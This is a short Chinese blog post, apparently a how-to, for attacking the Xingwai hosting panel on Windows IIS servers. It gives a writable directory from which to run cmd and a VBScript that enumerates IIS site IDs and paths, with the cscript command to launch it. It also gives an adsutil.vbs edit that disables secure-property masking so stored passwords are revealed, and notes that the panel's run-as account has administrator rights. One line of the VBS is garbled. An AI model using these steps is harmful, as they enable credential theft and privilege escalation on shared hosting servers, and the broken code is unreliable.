星外的利用

cmd执行的地址:

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

VBS读IIS配置信息

  
  
  
  
  1. Set ObjService=GetObject("IIS://LocalHost/W3SVC")     
  2. For Each obj3w In objservice     
  3. If IsNumeric(obj3w.Name) Then     
  4. sServerName=Obj3w.ServerComment     
  5. Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")     
  6. ListAllWebListAllWebListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf     
  7. End If     
  8. Next     
  9. WScript.Echo ListAllWeb     
  10. Set ObjService=Nothing     
  11. WScript.Quit 

执行:

/c "c:\cscript.exe" c:\web\1.vbs

作用是读取ID,再读密码。

修改C:\Inetpub\AdminScripts\adsutil.vbs(2003)

  修改后,

  
  
  
  
  1. If (Attribute = True) Then    
  2.         IsSecureProperty = False   
  3.     Else    
  4.         IsSecureProperty = False   
  5.     End If 

用法:adsutil.vbs enum w3svc/ID/root

注:星外的freehostrunat用户是administrotrs 组。

你可能感兴趣的:(cmd,职场,休闲)